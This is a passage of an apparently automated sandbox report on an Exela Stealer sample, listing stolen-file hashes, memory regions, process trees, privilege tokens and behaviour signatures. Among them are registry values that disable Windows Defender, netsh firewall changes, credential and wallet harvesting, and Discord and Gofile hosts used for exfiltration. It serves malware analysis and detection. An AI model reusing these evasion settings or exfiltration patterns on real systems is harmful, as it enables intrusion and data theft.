
C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Downloads\RestoreUndo.docx

MD5 756c3a7c0beba2b0e8baf0568e49b94d
SHA1 0f7a8d8443d59dbdebdb06128f36133017eaf4ee
SHA256 21dc7e83e8ea881bbd033b89dfefe1bed14cbce175f90ccec646b4daf17a095f
SHA512 8500c352e9f14968bedc5e415a512d90b274a41a7202cebd4b953e95d1a03962545e4d923b00301c0a336ff0029e3f46416fda0fbe059626ad60abaff3e7cfe3

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\InitializeBlock.xlsx

MD5 08fbd16c63a4c9be2bda0887f201d354
SHA1 c84041c956439c762b48f19c97787ddfbe2fba8b
SHA256 93dfb80bc5279d444efc0f215dd67b04b5acd7df951b27abf104cf2903707bf9
SHA512 8a3226a7460c8eb61032248505843849cbfce77e63b8604bdecc92b885607ca9220d5905213017294b53ed31167877dd452dc5cc6fda7cf075ee70fde02ffae1

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Documents\GrantFormat.xlsx

MD5 68c7562b2c370917810adae5c05a5592
SHA1 b5701994996f8b8408679d0cb38e62884c4bdad6
SHA256 6fad69e9ead3552e9cde24fdb38a657c3f94fd4d435853206d2faf9854c2a31e
SHA512 5d63c170138ef76e0b968a87ef985dd8567b9be6d2f2e607e45a8b9f0f1196a9fbdef62d1502aee385a1435ea2270f714ebf7290cc0b15226dc21a2164a4664b

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Desktop\UseUnpublish.png

MD5 3b3339ad8c8f0f7257893f484699d8f2
SHA1 fa0a890442175d10d54eb37622bc0642536fdb7e
SHA256 ae866eac56922fc173c91fba8f355c8a63fb215f97f017a12cfe81597a408a66
SHA512 1be6e0f7307b2338dd80e6675dd1829a737671522af7d63504a6cf1397b764805ff6d940c47724d02cbf217bc3b55a3f94abd076d4fa0ba4be487e5efb3a7dc8

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\PushBlock.jpg

MD5 7726aeaa4deee4e98c0225c29dc8978f
SHA1 1f04e48ed5e04f177775497c9b252930518ed35b
SHA256 299af8ad7a4067d373f034cce8176d2defb2431c5848dec3a5181f46361d32ef
SHA512 e983c5633951f474cd887835b9eef3f55462d1e332c0147f89698465cf180fe56d29f06cbefb6fc4bd2e4df04294174503ea868accc2fb89760868a1d7f7c810

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Pictures\CheckpointWatch.jpeg

MD5 db8d7d1edcadf7aefd57bff59187338e
SHA1 fe408a50a4012f043b0d4285aeabb5a2beed3a22
SHA256 683e3c5ef6dd87273b0c89a79fdb87e0874bdcec1f76228b4ce02e3d56c2e874
SHA512 ccb1549e8ca8fa1e6d5be1551954102a0d6b5efc3fa947758d107bdc20f59ddf393b0c2edcdca265d311d42d35a88d65fb9fa63ad84de91f13fc8c6386022ce4

C:\Users\Admin\AppData\Local\Temp\StealedFilesByExela\Music\StepUpdate.mp3

MD5 df5ba7c5a5bd6f276fafc598bd1728f6
SHA1 248a3ec12d736753504723d1f406111683996dca
SHA256 a1c89cf1b768b28e390f01b0d601639d93a1693929c57f2d71e08ed0fb546ef3
SHA512 56596f8e95f39404e0530115833f0fe731173f19b5098faab62de4a9c291900665c5dd4cf12c73349fd133ed8a18e3f4664ec59d0cb915f0dca8f9da6e4ac56b

memory/6092-581-0x00007FFF50240000-0x00007FFF50286000-memory.dmp

memory/6092-580-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp

memory/6092-573-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp

memory/6092-561-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

memory/6092-570-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp

memory/6092-609-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

memory/6092-647-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

memory/6092-659-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp

memory/6092-713-0x00007FFF4B100000-0x00007FFF4B21C000-memory.dmp

memory/6092-735-0x00007FFF503E0000-0x00007FFF50498000-memory.dmp

memory/6092-740-0x00007FFF5F5F0000-0x00007FFF5F60E000-memory.dmp

memory/6092-739-0x00007FFF50220000-0x00007FFF50231000-memory.dmp

memory/6092-738-0x00007FFF62680000-0x00007FFF6269C000-memory.dmp

memory/6092-737-0x00007FFF62DD0000-0x00007FFF62DE2000-memory.dmp

memory/6092-736-0x00007FFF62E40000-0x00007FFF62E55000-memory.dmp

memory/6092-734-0x00007FFF626A0000-0x00007FFF626CE000-memory.dmp

memory/6092-733-0x00007FFF614A0000-0x00007FFF614B4000-memory.dmp

memory/6092-732-0x00007FFF62DF0000-0x00007FFF62E13000-memory.dmp

memory/6092-731-0x00007FFF50240000-0x00007FFF50286000-memory.dmp

memory/6092-730-0x00007FFF62620000-0x00007FFF6264D000-memory.dmp

memory/6092-729-0x00007FFF52680000-0x00007FFF527F3000-memory.dmp

memory/6092-728-0x00007FFF62E20000-0x00007FFF62E39000-memory.dmp

memory/6092-727-0x00007FFF62650000-0x00007FFF62674000-memory.dmp

memory/6092-726-0x00007FFF68650000-0x00007FFF6865F000-memory.dmp

memory/6092-725-0x00007FFF625A0000-0x00007FFF625B9000-memory.dmp

memory/6092-724-0x00007FFF68640000-0x00007FFF6864D000-memory.dmp

memory/6092-723-0x00007FFF4B300000-0x00007FFF4B337000-memory.dmp

memory/6092-721-0x00007FFF4B340000-0x00007FFF4B358000-memory.dmp

memory/6092-720-0x00007FFF63250000-0x00007FFF6325A000-memory.dmp

memory/6092-719-0x00007FFF4B360000-0x00007FFF4B38D000-memory.dmp

memory/6092-716-0x00007FFF50290000-0x00007FFF502A8000-memory.dmp

memory/6092-715-0x00007FFF5F5D0000-0x00007FFF5F5E9000-memory.dmp

memory/6092-707-0x00007FFF504A0000-0x00007FFF50815000-memory.dmp

memory/6092-703-0x00007FFF63600000-0x00007FFF6360D000-memory.dmp

memory/6092-722-0x00007FFF4A470000-0x00007FFF4AD11000-memory.dmp

memory/6092-697-0x00007FFF53CC0000-0x00007FFF542A8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-06-30 18:07

Reported

2025-06-30 18:09

Platform

win11-20250619-en

Max time kernel

100s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Exela Stealer

stealer exelastealer

Exelastealer family

exelastealer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A

Grants admin privileges

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A api.gofile.io N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A api.gofile.io N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\ARP.EXE N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

System Network Connections Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3132 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3132 wrote to memory of 352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3132 wrote to memory of 248 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 3132 wrote to memory of 248 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 3132 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\no defender.exe
PID 3132 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\no defender.exe
PID 2512 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\no defender.exe C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 4472 N/A C:\Users\Admin\AppData\Local\Temp\no defender.exe C:\Windows\system32\cmd.exe
PID 4472 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 248 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 248 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 4472 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 5336 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 6012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 5340 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 5340 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 2936 wrote to memory of 716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2936 wrote to memory of 716 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 4392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5340 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5340 wrote to memory of 708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4472 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4472 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1004 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1004 wrote to memory of 2000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 952 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1628 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 952 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1628 wrote to memory of 956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1628 wrote to memory of 956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1992 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1992 wrote to memory of 2404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4472 wrote to memory of 4724 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
